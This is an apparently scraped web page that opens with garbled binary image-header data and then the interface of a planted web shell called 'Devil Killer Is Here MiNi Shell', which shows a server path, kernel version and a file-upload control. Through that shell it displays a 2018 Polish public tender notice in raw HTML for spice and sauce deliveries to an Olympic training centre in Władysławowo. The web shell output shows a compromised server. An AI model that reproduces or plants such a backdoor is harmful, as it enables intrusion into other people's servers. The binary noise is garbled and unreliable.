JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180816/604727-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 604727-N-2018 z dnia 2018-08-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Sukcesywne dostawy przypraw, sosów i dresingów wraz z usługą transportu do Ośrodka Przygotowań Olimpijskich we Władysławowie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">32790700060</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Żeromskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">52</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">84-120 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Władysławowo</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">586 746 314</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi.wladyslawowo@cos.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">586 746 350</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.cos.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Instytucja Gospodarki Budżetowej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.cos.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.cos.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"> Wymagane jest złożenie oferty w formie pisemnej za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Centralny Ośrodek Sportu, Ośrodek Przygotowań Olimpijskich we Władysławowie Ul. Żeromskiego 52, 84-120 Władysławowo</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Sukcesywne dostawy przypraw, sosów i dresingów wraz z usługą transportu do Ośrodka Przygotowań Olimpijskich we Władysławowie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">32/2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Sukcesywne dostawy przypraw, sosów i dresingów wraz z usługą transportu do Ośrodka Przygotowań Olimpijskich we Władysławowie Dostarczane produkty muszą być wysokiej jakości, muszą spełniać wymagania jakościowe, dotyczące przechowywania, pakowania i transportu zawarte w Polskich normach przenoszących normy europejskie oraz posiadać ważne terminy przydatności do spożycia, a Wykonawca powinien posiadać atesty i/lub pozwolenia potwierdzające, że poprzez odpowiednie odniesienie dokładnie oznaczone produkty będące przedmiotem dostawy odpowiadają określonym normom. Wymagane jest złożenie odpowiedniego oświadczenia o którym mowa w pkt. 6.3. SIWZ, a Zamawiający zastrzega sobie prawo do żądania przedstawienia odpowiednich dokumentów potwierdzających powyższe okoliczności i jakość produktów przy danej dostawie</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15870000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15871260-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15891000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15872400-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15872000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15833100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15893200-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15411200-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>60100000-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">12</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>12</TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Złożenie wraz z ofertą oświadczenia o treści: "OŚWIADCZAMY, że dostarczane produkty będą wysokiej jakości i będą spełniać wymagania jakościowe, dotyczące przechowywania, pakowania i transportu zawarte w Polskich normach przenoszących normy europejskie oraz posiadać ważne terminy przydatności do spożycia i posiadamy atesty i/lub pozwolenia potwierdzające, że poprzez odpowiednie odniesienie dokładnie oznaczone produkty będące przedmiotem dostawy odpowiadają określonym normom. Oświadczamy ponadto, ze na każde żądanie Zamawiającego przedstawimy odpowiednie dokumenty potwierdzające powyższe okoliczności i jakość produktów przy danej dostawie"</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1.Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą uczestniczącym w niniejszym postępowaniu, nie prowadzą do zakłócenia konkurencji w postępowaniu - oświadczenie to składa wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> 